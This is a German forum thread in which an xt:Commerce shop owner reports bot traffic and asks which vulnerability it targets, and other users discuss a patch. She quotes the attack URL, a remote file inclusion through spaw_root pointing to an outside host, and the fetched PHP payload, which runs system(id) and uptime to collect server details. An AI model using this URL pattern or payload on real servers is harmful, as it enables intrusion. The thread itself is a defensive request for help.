Hackerangriff spaw_control_.class.php???

[marama]

Hallo,

bei mir marschiert gerade ein bot durch den Shop der alle Seiten mit
/reviews.php?language=fr/////admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://indo.home.ro/idscan.txt???

auf allen Seiten durchrackert.

Ich nehme an das ist ein hacker... auf welche Sicherheitslücke zielt der ab? Sollte ich da eine bestimmte Lücke nochmal prüfen?

Vielen Dank,

Martina

Nachtrag: Die http://indo.home.ro/idscan.txt enthält

Zitat:

echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "ALBANIA;br>";
exit;

[sfs]

... sorry, ich kann keinen neuen Tread aufmachen ... da stimmt was mit meinen Rechten nicht.

Im Netz bin ich aber auf einen Sicherheitspatch von Ruhrmedia gestoßen, der eine aktuelle Sicherheitslücke vom xtc (alle xtCommerce-Versionen ab 3.0.2 ) schließen soll.

WARUM findet man hier im Forum keinen Hinweis auf eine Lücke ?

Infos unter ruhrmedia .de

????

[Fry]

Weils keine Lücke augenscheinlich gibt.

Die SuFu liefert dafür folgendes, was du hättest finden müssen:

Neues Sicherheitsloch von Gambio, auch in XTC?

Zitat:

Zitat von mzanier

Derzeit ist uns kein funktionierender Exploit bekannt.

Eine Behebung wie bei diesem Patch vorgeschlagen, würde ein (wenn) existstendes Problem auch nicht vollständig Lösen.

Wenn jemand einen Funktionierenden Exploit hat, kan ner uns diesen gerne senden und wir überprüfen dies.

In dem Thread ging es genau darum, das rote ist übrigens mein Suchbegriff